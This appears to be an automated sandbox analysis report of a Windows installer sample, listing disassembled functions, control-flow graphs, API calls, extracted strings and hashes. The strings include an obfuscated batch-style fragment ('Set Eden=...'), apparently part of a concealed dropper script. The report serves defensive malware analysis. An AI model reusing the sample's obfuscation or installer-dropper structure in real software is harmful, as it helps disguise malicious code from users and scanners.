                                                                                                                                                                                                                                                                                                        control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                                        • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                                        • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                                        • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                                        • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                                        • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                                                        • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                        • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                                                                                                                                                                                        Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000,FellowShoppercomMineralsDangerGifStructures,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,FellowShoppercomMineralsDangerGifStructures,FellowShoppercomMineralsDangerGifStructures,00000000,00000000,FellowShoppercomMineralsDangerGifStructures,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424170,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: FellowShoppercomMineralsDangerGifStructures$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                                                                                                                                                                                                                        • API String ID: 4286501637-2555774084
                                                                                                                                                                                                                                                                                                        • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                                        • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                                                                                                                                                                                        Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                                        • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                                        • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                                        • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                                        • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                                        • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                                                                                                                                                                                        Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                                        • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00424170,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Set Eden=lLSThinkpad-Reprint-Reid-lUKPh-Hispanic-Anniversary-Savings-Transexual-KejcCases-Walnut-Tommy-SreSAssumed-Presently-LjLos-Services-Costumes-Merit-Bankruptcy-Dj-UEVmEric-Lb-Likelihood-Bdsm-Weighted-Slip-Keno-Reaction-Set Machine=DNiyvEl, xrefs: 004033FD
                                                                                                                                                                                                                                                                                                        • pAB, xrefs: 0040346F, 0040348A, 00403513
                                                                                                                                                                                                                                                                                                        • ... %d%%, xrefs: 004034C8
                                                                                                                                                                                                                                                                                                        • pAB, xrefs: 004033AB
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                                        • String ID: ... %d%%$Set Eden=lLSThinkpad-Reprint-Reid-lUKPh-Hispanic-Anniversary-Savings-Transexual-KejcCases-Walnut-Tommy-SreSAssumed-Presently-LjLos-Services-Costumes-Merit-Bankruptcy-Dj-UEVmEric-Lb-Likelihood-Bdsm-Weighted-Slip-Keno-Reaction-Set Machine=DNiyvEl$pAB$pAB
                                                                                                                                                                                                                                                                                                        • API String ID: 651206458-1376930008
                                                                                                                                                                                                                                                                                                        • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                                        • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                                                                                                                                                                                        Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00445D80,00424170,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424170,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                                                                                                                                                                                        Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f69 GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 745 401f6e-401f7b 732->745 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 751 402387-40238d GlobalFree 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 750 4030e3-4030f2 742->750 745->750 745->751 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(006DB088), ref: 00402387
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
